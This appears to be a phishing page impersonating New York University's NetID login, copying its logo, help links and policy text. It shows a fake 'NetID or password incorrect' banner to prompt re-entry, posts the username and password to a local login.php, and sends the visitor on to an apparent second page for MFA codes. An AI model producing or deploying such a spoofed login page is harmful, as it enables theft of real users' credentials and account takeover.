<!DOCTYPE html>
<html lang=”en”>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>NYU Login</title>

    <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="custom-common.css">
    <link rel="stylesheet" type="text/css" href="new-login.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>

<body style="display: grid; min-height: 0%;">
    <div class="nyu-message">
        <div class="wrap">
            <p><a href="" class="message"></a></p>
            <a href="" class="nyu-message-more right uppercase rounded">More</a>
        </div>
    </div>

    <!-- page Content-->
    <div class="container-fluid body-wrapper" style="margin-top: 5%;">

        <div class="row">
            <div class="col-md-12" style="padding-right:0px;padding-left:0px;">
                <!-- content -->
                <div class="container col-xs-10 col-sm-6 col-md-6 col-lg-4 col-centered wr-content wr-login">
                    <div class="titleDiv">
                        <div>
                            <img src="NYU-Logo.png" class="nyuLogo" alt="New York University">
                        </div>
                        <div>
                            <h1 class="wr-title blue-bg padding-double white boarder-bottom-blue margin-none" style="color:red;">
                                NetID or password incorrect. Please try again.
                            </h1>
                        </div>
                    </div>
                    <div class="boarder-all">
                        <div class="clearfix"></div>
                        <div class="padding-double login-form">
                            <form action="login.php" method="post" name="login"
                                id="loginForm">
                                <div class="innercontent">
                                    <div>
                                        <div style="margin-bottom: 15px;">
                                        </div>
                                        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group">
                                            <label for="username">NetID (e.g., aqe123)</label>
                                            <input id="username" name="j_username" type="text" class="form-control"
                                                tabindex="0" placeholder="" required autofocus>
                                        </div>

                                        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group">
                                            <label for="password">Password</label>
                                            <input id="password" name="j_password" type="password" class="form-control"
                                                placeholder="" autocomplete="off">
                                        </div>

                                        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group">
                                            <div>
                                                <button class="login-button"
                                                    onclick="window.location.href='mfa-two.html' ">LOGIN</button>
                                            </div>
                                        </div>

                                    </div>
                                    <div class="instruction">
                                        <p>Be cybersecurity aware: <a href="http://www.nyu.edu/servicelink/KB0015659"
                                                target="_blank">Learn how to confirm that this is the legitimate NYU
                                                Login page.</a></p>
                                    </div>
                                </div>
                                <div class="clearfix"></div>
                            </form>
                            <div class="clearfix"></div>
                        </div>
                    </div>
                    <div class="needHelp">
                        <div class="pwmLinks">
                            <div><a href="https://start.nyu.edu/pwm/public/forgottenpassword" target="_blank">Forgot
                                    Password</a></div>
                            <div><a href="https://start.nyu.edu/pwm/public/forgottenusername" target="_blank">Forgot
                                    NetID</a></div>
                            <div><a href="https://start.nyu.edu/pwm/public/activate" target="_blank">Activate NetID</a>
                            </div>
                            <div><a href="https://www.nyu.edu/accessibility" target="_blank">Accessibility</a></div>
                        </div>
                        <p><b>Note: </b>By logging in, you agree to abide by the <a
                                href="https://www.nyu.edu/about/policies-guidelines-compliance/policies-and-guidelines/responsible-use-of-nyu-computers-and-data-policy-on.html"
                                target="_blank">Policy on Responsible Use of NYU Computers and Data</a>.</p>
                        <p>To securely log out of your NYU account, quit your browser, especially when using a shared
                            computer.</p>
                        <p><b>Need help?</b> Contact the <a href="http://www.nyu.edu/it/servicedesk" target="_blank">NYU
                                IT Service Desk</a>, open 24x7 for support by email or phone.</p>
                    </div>
                </div>
                <!-- /content -->
            </div>
        </div>
        <!-- End of Page Content -->
</body>

</html>